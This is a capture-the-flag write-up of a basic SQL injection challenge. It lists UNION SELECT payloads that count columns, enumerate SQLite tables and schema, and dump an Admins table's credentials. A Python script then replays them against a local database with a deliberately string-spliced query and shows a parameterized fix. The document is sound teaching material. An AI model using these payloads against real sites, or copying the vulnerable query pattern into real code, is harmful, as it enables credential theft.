When we visit challenge URL we get following response
Nothing on the page gives anything back. Let's register a user with username sahil, password sahil and content sahil. Logging in with it, we get the profile page shown below.
Nothing interesting... Thinking it over, one thing to try on any register/login feature backed by a database is SQL injection.
Start with a single quote (') to check whether an error occurs.
Now try some SQL payloads and observe the responses.
- sahil' order by 2000;--
ORDER BY 2000 errors out; lowering the number until the error disappears shows that 4 columns exist.
- sahil' union select 1,2,3,4;--
Positions 2, 3 and 4 are reflected in the profile page, so we can place our payloads there.
- sahil' union select 1,sqlite_version(),3,4;--
We see that the database is SQLite 3.35.5.
- sahil' union SELECT 1,group_concat(tbl_name),3,4 FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%';--
Listing the table names in the database gives Admins and users.
- sahil' union SELECT 1,sql,3,4 FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name='Admins';--
The CREATE statement gives us the column names: id, user, pass, content.
- sahil' union SELECT 1,user,3,4 from Admins;--
There is a user named Adminnn; let's read its password.
- sahil' union SELECT 1,user,pass,content from Admins;--
We finally get the flag: shellctf{Sql_1Nj3c7i0n_B45iC_XD}
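As an added example (not part of the original writeup or the challenge's code), the following Python script replays the enumeration above against a local in-memory SQLite database. The schema (tables users and Admins with columns id, user, pass, content) follows what the injection revealed; the rows, the vulnerable profile_vulnerable lookup and the parameterized profile_safe version are constructed stand-ins, not the challenge's backend. It also does the column-count step properly, stepping ORDER BY n until it errors instead of a single ORDER BY 2000 probe, and shows that the same payloads return nothing once the username is passed as a bound parameter.

```python
import sqlite3

# Constructed sample data: the flag value from the writeup is reused here only
# as the content of the Admins.pass column in the local database.
FLAG = "shellctf{Sql_1Nj3c7i0n_B45iC_XD}"


def build_db():
    """In-memory SQLite database mirroring the two tables the injection revealed."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        f"""
        CREATE TABLE users (id INTEGER PRIMARY KEY, user TEXT, pass TEXT, content TEXT);
        CREATE TABLE Admins (id INTEGER PRIMARY KEY, user TEXT, pass TEXT, content TEXT);
        INSERT INTO users (user, pass, content) VALUES ('sahil', 'sahil', 'sahil');
        INSERT INTO Admins (user, pass, content) VALUES ('Adminnn', '{FLAG}', 'admin content');
        """
    )
    return con


def profile_vulnerable(con, username):
    """Hypothetical profile lookup that splices the username into the SQL text (the bug)."""
    sql = f"SELECT id, user, pass, content FROM users WHERE user = '{username}'"
    return con.execute(sql).fetchall()


def profile_safe(con, username):
    """Same lookup with a bound parameter: any payload is just a string literal."""
    sql = "SELECT id, user, pass, content FROM users WHERE user = ?"
    return con.execute(sql, (username,)).fetchall()


def count_columns(con, max_cols=20):
    """Step 1: ORDER BY n succeeds while n <= column count and errors beyond it."""
    for n in range(1, max_cols + 1):
        try:
            profile_vulnerable(con, f"sahil' order by {n};--")
        except sqlite3.OperationalError:
            return n - 1
    return None


def injected_rows(con, payload):
    """Rows contributed by the UNION half of the query (everything but sahil's own row)."""
    return [row for row in profile_vulnerable(con, payload) if row[1] != "sahil"]


def enumerate_sqlite(con):
    """Steps 2-5 of the writeup chained together: version, tables, schema, dump."""
    version = injected_rows(con, "sahil' union select 1,sqlite_version(),3,4;--")[0][1]
    tables = injected_rows(
        con,
        "sahil' union SELECT 1,group_concat(tbl_name),3,4 FROM sqlite_master "
        "WHERE type='table' and tbl_name NOT like 'sqlite_%';--",
    )[0][1].split(",")
    schema = injected_rows(
        con,
        "sahil' union SELECT 1,sql,3,4 FROM sqlite_master WHERE type!='meta' "
        "AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name='Admins';--",
    )[0][1]
    admins = injected_rows(con, "sahil' union SELECT 1,user,pass,content from Admins;--")
    return {"version": version, "tables": tables, "schema": schema, "admins": admins}


if __name__ == "__main__":
    db = build_db()
    print("columns:", count_columns(db))
    for key, value in enumerate_sqlite(db).items():
        print(f"{key}: {value}")
    # The parameterized lookup treats the payload as a literal username: no match.
    print("safe lookup:", profile_safe(db, "sahil' union SELECT 1,user,pass,content from Admins;--"))
```

The group_concat result comes back in whatever order SQLite happens to scan sqlite_master, so treat the table list as a set rather than relying on "Admins,users" versus "users,Admins".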
Hints with point values (cost):
- Hint 1: a sample query: username' union select 1,sqlite_version(),3,4;-- (50 pts)
- Hint 2: look in the Admins table for the username Adminnn (70 pts)